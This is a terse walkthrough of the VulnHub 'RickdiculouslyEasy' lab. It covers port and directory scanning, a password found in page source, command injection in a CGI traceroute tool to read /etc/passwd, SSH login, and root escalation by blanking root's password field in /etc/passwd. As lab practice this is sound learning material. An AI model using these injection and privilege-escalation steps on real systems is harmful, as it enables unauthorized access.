Machine Link : https://www.vulnhub.com/entry/rickdiculouslyeasy,207/ STEP1 : arp-scan -l and get the ip STEP2 : nmap -T4 -sCV -p- 192.168.0.104 -vv -Pn STEP3 : FINDING port 80 http is open port 21 ftp is open and Anonymous FTP login allowed 22/tcp open ssh? 9090/tcp open http 22222/tcp open ssh open port 60000/tcp open port 13337/tcp STEP4 : Open site with the ip in browser STEP5 : gobuster dir -u http://192.168.0.104 -w /usr/share/wordlists/dirbuster/directory-list-2.3- medium.txt STEP6 : FINDING /passwords (Status: 301) [Size: 239] [-- http://192.168.0.104/passwords/] [17:25:02] 200 - 126B - /robots.txt FINDING open the robots.txt /cgi-bin/root_shell.cgi /cgi-bin/tracertool.cgi /cgi-bin/* STEP7 : open the link and go to view sourse and get the password winter of http://192.168.0.104/passwords/password.html page STEP8 : nc 192.168.0.104 60000 ------ to get the shell with a flag STEP9 : Open http://192.168.0.104/cgi-bin/tracertool.cgi STEP10: TYPE ip ; more /etc/passwd ------ to get all the user list FINDING RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash Morty:x:1001:1001::/home/Morty:/bin/bash Summer:x:1002:1002::/home/Summer:/bin/bash STEP11: Try ssh [email protected] -p 22222 with password winter STEP12: [Summer@localhost ~]$ nano /etc/passwd ------ remove x from first line root:x:0:0:root:/root:/bin/bash ------ make it ------ root::0:0:root:/root:/bin/bash save the file by ctrl+x - ctrl+y and hit enter STEP13: [Summer@localhost ~]$ su root ------it will not as for password and you will be root [root@localhost Summer]# whoami root